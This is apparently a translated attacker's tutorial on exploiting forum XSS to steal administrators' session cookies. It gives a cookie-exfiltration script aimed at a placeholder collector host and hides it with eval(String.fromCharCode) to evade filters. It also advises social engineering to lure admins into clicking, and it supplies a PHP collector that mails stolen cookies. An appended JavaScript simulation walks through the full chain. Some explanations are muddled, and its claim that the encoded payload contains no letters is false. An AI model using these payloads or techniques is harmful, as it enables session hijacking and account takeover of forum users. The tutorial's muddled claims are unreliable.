For example, once you find a spot where XSS is possible, pop an alert first to confirm it:
<script>alert(1)</script>
(What the alert says does not matter; just get it to pop.)

Then get yourself a cookie-stealing file. The purpose is to have other visitors walk into the trap we have designed:
<script>document.location='http://URL.com/cookie.php?cookie='+escape(document.cookie)</script>

There is really nothing more to say about how that part works. What we are mainly talking about here is how to hide the JavaScript so that it actually executes.

You are probably used to visiting milw0rm.com every day to look at the EXPs. Every time an EXP for an XSS vulnerability is released we go and exploit it, yet we never get a single cookie back. Why is that?

Large forums like Magic and PHPBB all have XSS vulnerabilities. Suppose I post this on one of them:
<script>document.location='http://URL.com/cookie.php?cookie='+escape(document.cookie)</script>
The JavaScript will just show an error instead of running.
There are two solutions.

The first is to encode the sensitive external part (the URL) in Unicode. An encoder for this is at http://www.mikezilla.com/exp0012.html. Encoded, it looks like this (every character of the script becomes a decimal code point, and eval rebuilds and runs it):
<script>eval(String.fromCharCode(104,116,116,112,...))</script>

If the above does not work, use the second method: JavaScript's eval function together with String.fromCharCode. As mentioned above, on some sites the payload can be encoded as Unicode code points; for example, the codes 104, 116, 116, 112 decode to "http".

If the forum uses a different editor, such as the WYSIWYG editor in PHPWind, a URL typed in directly as http://url.com is bound to be exposed. In that case reshape the URL to fit the editor's own link format. For example, if the site collecting the cookies is http://www.URL.com, we submit it in the editor's link markup (the page shows the result as http://www.url.com), and of course the displayed part can be replaced with something attractive to lure the administrator into clicking. A little social engineering is all it takes.

Now that the basic idea is in place, let's implement it.

Step 1: The administrator sees the trap we have built, thinks it looks fine, and clicks it.
Step 2: The JavaScript executes successfully.
Step 3: The cookie-stealing file we constructed steals the cookie.
Step 4: We cannot be so stupid as to link to the URL in plain text; the URL is encoded in Unicode (customarily called "encryption" here) with http://www.mikezilla.com/exp0012.html.
Step 5: The intercepted cookie is of course not plain text (escape() percent-encoded it); decode it, then use the Firefox Cookie Editor extension, or another tool such as CookieEditor, to replace your own cookie with it.

One caveat: document.cookie only exposes cookies the site did not mark HttpOnly, so a session cookie set with that flag will never show up in what is collected.

Personal suggestion: to steal cookies you don't necessarily need hosting space to collect them. Just create a mailbox and have the collector mail them to you:
<?php
// cookie.php: mail whatever arrives in ?cookie= to the collection mailbox
mail("<your mailbox>@hotmail.com", "cookie monster", $_REQUEST['cookie']);
?>
<html>
<script>document.location='http://www.URL.com/';</script>
</html>
The closing script sends the visitor on to http://www.URL.com/ so they see a normal page rather than a blank one.
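As an added example (not code from the original article), here is the whole chain from the steps above built and checked offline in JavaScript: the trap, the eval(String.fromCharCode(...)) encoding that hides the collector URL, what the victim's browser ends up requesting, and what the collector extracts and mails. The collector URL http://www.URL.com/cookie.php, the phpBB-style victim cookie and the mailbox are constructed placeholders; the browser is simulated with a fake document object, so nothing is sent anywhere.

```javascript
// Added example, not from the original article. All names and values below
// (collector URL, victim cookie, mailbox) are constructed placeholders.

const COLLECTOR_URL = "http://www.URL.com/cookie.php";      // placeholder collector
const MAILBOX = "<your mailbox>@hotmail.com";                 // placeholder mailbox
// Constructed phpBB-style cookie; phpbb2mysql_data is itself URL-encoded,
// which is why the round trip through escape()/unescape() is worth checking.
const VICTIM_COOKIE =
  "phpbb2mysql_sid=1a2b3c4d; phpbb2mysql_data=a%3A1%3A%7Bs%3A6%3A%22userid%22%3Bi%3A2%3B%7D";

// Step 3: the raw trap from the article, parameterised on the collector URL.
// escape() is the legacy encoder the article uses; it percent-encodes '=' and ';'.
function buildTrap(collectorUrl) {
  return "document.location='" + collectorUrl + "?cookie='+escape(document.cookie)";
}

// Step 4: hide the script. Every character becomes its decimal code point and
// eval(String.fromCharCode(...)) rebuilds it at run time; 104,116,116,112 is "http".
function encodeForEval(js) {
  const codes = Array.from(js, ch => ch.charCodeAt(0));
  return "eval(String.fromCharCode(" + codes.join(",") + "))";
}

// What eval() would reconstruct. Parsing the wrapper back out lets us verify the
// encoding round-trips without calling eval on the text ourselves.
function decodeFromCharCode(encoded) {
  const m = /^eval\(String\.fromCharCode\(([\d,]*)\)\)$/.exec(encoded);
  if (!m) throw new Error("not an eval(String.fromCharCode(...)) payload");
  return String.fromCharCode(...m[1].split(",").map(Number));
}

// Steps 1-2: simulate the victim. A fake document stands in for the browser;
// the trap runs with it in scope and we read back where it tried to navigate.
function simulateVictim(trapJs, cookieString) {
  const fakeDocument = { cookie: cookieString, location: null };
  new Function("document", "escape", trapJs)(fakeDocument, escape);
  return fakeDocument.location;
}

// Step 3, server side: what cookie.php sees. Pull the raw cookie parameter out
// of the query string and undo escape() with unescape(), which also handles the
// %uXXXX sequences escape() emits for non-ASCII (decodeURIComponent would not).
function collect(requestUrl) {
  const query = requestUrl.split("?")[1] || "";
  for (const part of query.split("&")) {
    const [name, ...rest] = part.split("=");
    if (name === "cookie") {
      const encoded = rest.join("=");
      return { to: MAILBOX, subject: "cookie monster", encoded, cookie: unescape(encoded) };
    }
  }
  return null;
}

// Run the whole chain and return every intermediate so it can be inspected.
function runChain() {
  const trap = buildTrap(COLLECTOR_URL);
  const hidden = encodeForEval(trap);       // what gets posted on the forum
  const executed = decodeFromCharCode(hidden); // what the browser's eval rebuilds
  const hit = simulateVictim(executed, VICTIM_COOKIE);
  const mailed = collect(hit);
  return { trap, hidden, executed, hit, mailed };
}

if (typeof require !== "undefined" && require.main === module) {
  const result = runChain();
  console.log("posted payload:", result.hidden);
  console.log("victim requested:", result.hit);
  console.log("collector mails:", result.mailed);
}
```

Run it with node and compare the posted payload with the request the victim makes: the posted text contains no letters at all (only digits and commas inside the wrapper), which is exactly why a filter that looks for http:// in the post lets it through, while the collector still receives the cookie intact after unescape().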